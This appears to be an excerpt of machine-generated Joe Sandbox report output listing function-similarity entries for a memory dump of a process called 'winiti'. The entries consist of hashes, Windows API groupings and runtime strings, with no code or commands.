                  • Opcode ID: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                  • Instruction ID: a631504ee5ccf36ceb0252255e6a2383b96782c5b9d41d6f00dab553f9949252
                  • Opcode Fuzzy Hash: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                  • Instruction Fuzzy Hash: 74317671A08B4586F7209F65F84A3DA7BA1FB85B88F14403DDA4E47B69DF3CC6468B40
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: [ KeepUnwinding ]
                  • API String ID: 2546344036-400895726
                  • Opcode ID: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                  • Instruction ID: bc03652797d1547fed7e402512543eb8b70ebd777d305989926618b52126d6aa
                  • Opcode Fuzzy Hash: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                  • Instruction Fuzzy Hash: 72C18972A01B44C2EB95CF25E5857DD33A5F344B89F58527ACE490B3A8DF31C6AAC350
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                  • String ID: InitializeContext2$kernel32.dll
                  • API String ID: 4102459504-3117029998
                  • Opcode ID: 32bbcba0a65d150fc54e544dc3aa3406b0ed7865d1078f9dde3bace6e9329ecd
                  • Instruction ID: c766fb000b4fa87926274620f2bc9ad9efc7041a2b440ce7fef6fb718d29ee76
                  • Opcode Fuzzy Hash: 32bbcba0a65d150fc54e544dc3aa3406b0ed7865d1078f9dde3bace6e9329ecd
                  • Instruction Fuzzy Hash: 4C318D31E05B88C2FB058B55F94639AA390BB84B94F444479ED4D43BA8EF7CD64BC710
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                  • String ID: QueueUserAPC2$kernel32
                  • API String ID: 3714266957-4022151419
                  • Opcode ID: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                  • Instruction ID: b4d72bed61675486795058888588dceaafb2d69e3f8acd7cfea4761865988793
                  • Opcode Fuzzy Hash: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                  • Instruction Fuzzy Hash: 79318274B00B40C2EA549B19E9583E933A1BB45BF4F4412BCD96A8BBE5DF2CC64BC741
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                  • Instruction ID: 10a9e1d0390f57fdeada19e25c3cd208c79995c06b1c67b84ddbf1f411bff0e6
                  • Opcode Fuzzy Hash: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                  • Instruction Fuzzy Hash: B1A1ACB1F08603C7F7589B25AC86BE627B5AB21754F20037DE919876EADF24DA07C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                  • String ID:
                  • API String ID: 510365852-3916222277
                  • Opcode ID: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                  • Instruction ID: 9f16e0870d44e2a58a403c39efc5c7a1855a292645cadaa2ab99e1bf984dd7a7
                  • Opcode Fuzzy Hash: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                  • Instruction Fuzzy Hash: F611AEB2A04B84CAD760EF69B4413CA7360F3457B4F181339A6BD4BBD6CB74C6468B00
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                  • Instruction ID: 78153649ae04c5e4675b1065240a8adc1915d2f6f770a92d8227675a3af16587
                  • Opcode Fuzzy Hash: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                  • Instruction Fuzzy Hash: E681B271F00641C7FB989B29A8867EA3790AB40394F14017DE969873EBDB39CA47DB40
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                  • Instruction ID: 4468a35e14258bf22430f18426f27cb062aadb8cc564ead3e124c49e91998e25
                  • Opcode Fuzzy Hash: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                  • Instruction Fuzzy Hash: B471BCB2B05B80C2FB189B61AA463E967E1F754BD8F08457DDE4947B9ADF38C652C300
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 418b0774b7d3228d4d9ac1118a31d47de2794695f603a46847a331a745cbe1d0
                  • Instruction ID: abed8c394a4d8a55167ca6df4cfa803edc6deb3dff1b051ea7af765fb4538716
                  • Opcode Fuzzy Hash: 418b0774b7d3228d4d9ac1118a31d47de2794695f603a46847a331a745cbe1d0
                  • Instruction Fuzzy Hash: 84E19FB2B01A559ADA548F65E954BE863A1FB047F4F80433AD93D57BDDDB34C21AC300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: Process is terminating due to StackOverflowException.
                  • API String ID: 2546344036-2200901744
                  • Opcode ID: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                  • Instruction ID: 3d5fea04b7b74230ec1840f805b00535d56c1d3328ec789a78e2a6e158785014
                  • Opcode Fuzzy Hash: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                  • Instruction Fuzzy Hash: 3A51D772F12B44C2FF549B1AE4503E92390E758B94F4984BEDA1E437A4DF29C69BC300
                  APIs
                  • LoadLibraryExW.KERNEL32(?,?,?,?,000000013FC00000,000000013F6330AD,?,?,00000000,000000013F61FA9C,?,FFFFFFFF,47AE147AE147AE15,000000013F60964C), ref: 000000013F633002
                  • GetProcAddress.KERNEL32(?,?,?,?,000000013FC00000,000000013F6330AD,?,?,00000000,000000013F61FA9C,?,FFFFFFFF,47AE147AE147AE15,000000013F60964C), ref: 000000013F63301C
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32.dll
                  • API String ID: 2574300362-4754247
                  • Opcode ID: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                  • Instruction ID: 7e50d20fc654da334f45e9b516ee03740c09f0b74b88723abc9cb66276187586
                  • Opcode Fuzzy Hash: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                  • Instruction Fuzzy Hash: 5D21D0B2F2525042FFB88739E5577FD5381D398794F8C803FC90A86AE5DA1DCAC28A00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32
                  • API String ID: 2574300362-4273408117
                  • Opcode ID: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
                  • Instruction ID: 16567847ea2e4cd399e11dd8db8a8b15bbe820be492245a21c8aff00b179f6f4
                  • Opcode Fuzzy Hash: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
                  • Instruction Fuzzy Hash: DBE0EC75F52741D1FF49AB55A84A7D833907BA9B41FC845ADC82E823A1EE3C838BC710
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32
                  • API String ID: 2574300362-4273408117
                  • Opcode ID: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                  • Instruction ID: 99b59b43ff176e5fe92114a27f46757ed3c38a8bb89ba236f25a04909d7d87d6
                  • Opcode Fuzzy Hash: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                  • Instruction Fuzzy Hash: CFE0EC38F12741D1FF49AB55A84A7D423A17B89790FCC81ACC81D42350EE2C879BD710
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                  • Instruction ID: 663b77c825b60f0b5c82d666c2f4c7c30ef37377dda9cf54e758f778ea580627
                  • Opcode Fuzzy Hash: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                  • Instruction Fuzzy Hash: 9F41D2B6F1065492EFA48B25C0423ED6390E72CF94F18853FDA4A877CADA3CCA438751
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                  • Instruction ID: 465538b9affbd538a8e45464ec8dc52e3d811905f7386aeb122890f6daef83d4
                  • Opcode Fuzzy Hash: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                  • Instruction Fuzzy Hash: 1E518EB0F14601CBF7599B6599977E627E8AB40358F1441BDE80AC32E5DB28DF07C601
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                  • Instruction ID: 31a406dccfed760e91908ea19a42eb100771b3022fa4e2366689652c72cbda00
                  • Opcode Fuzzy Hash: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                  • Instruction Fuzzy Hash: F34104B6B05784A2FA619B11E1167ED7BE8E744B98F59047CDE480739ADF78CA83C340
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                  • Instruction ID: 82623d0bb5752d52e1ac37a1cd8bd69f0b27cbb1907cfecb3b6668c9878d1ef2
                  • Opcode Fuzzy Hash: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                  • Instruction Fuzzy Hash: 0B31AFB2A05B5482EA659F65A2423D9B7E4F785B98F58003CEF590779BDF7CCA42C300
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ErrorLastMultipleWait$HandlesObjects
                  • String ID:
                  • API String ID: 2817213684-0
                  • Opcode ID: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                  • Instruction ID: 0ec6867dbc8c4a8328232f602fcc174e7fc0c101e07bfd2042285085f249ec6e
                  • Opcode Fuzzy Hash: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                  • Instruction Fuzzy Hash: FB11C435B08B54C3E7248B1AF40535AB7A1F784B95F54013DEAD987BA9CB3CCA458B40
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                  • String ID:
                  • API String ID: 2933794660-0
                  • Opcode ID: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                  • Instruction ID: a6431462b84827648b4ed0d6a9348ea0b0a9eef2aa01d6a08f2bd176101f508a
                  • Opcode Fuzzy Hash: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                  • Instruction Fuzzy Hash: BD110C36B11F04CAEB00CF64E8593E837A4F759B98F441E39DA6D86BA8DF78C2558340
                  APIs
                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,000000013F659A6B), ref: 000000013F65A930
                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000000013F659A6B), ref: 000000013F65A971
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFileHeaderRaise
                  • String ID: csm
                  • API String ID: 2573137834-1018135373
                  • Opcode ID: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                  • Instruction ID: f290f5f0022c1b605dbbdbf036a7bb581224f7429d8ab29e80b764996635656c
                  • Opcode Fuzzy Hash: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                  • Instruction Fuzzy Hash: C9116D32614B8082EB208F15F8443997BE4F788B94F194224DEDC47B69DF3CC6528B00
                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,00000000,000000013F613F8F,?,?,?,000000013F62025A), ref: 000000013F613E5A
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,000000013F613F8F,?,?,?,000000013F62025A), ref: 000000013F613E9C
                  • EnterCriticalSection.KERNEL32(?,?,00000000,000000013F613F8F,?,?,?,000000013F62025A), ref: 000000013F613EC7
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,000000013F613F8F,?,?,?,000000013F62025A), ref: 000000013F613EE8
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp
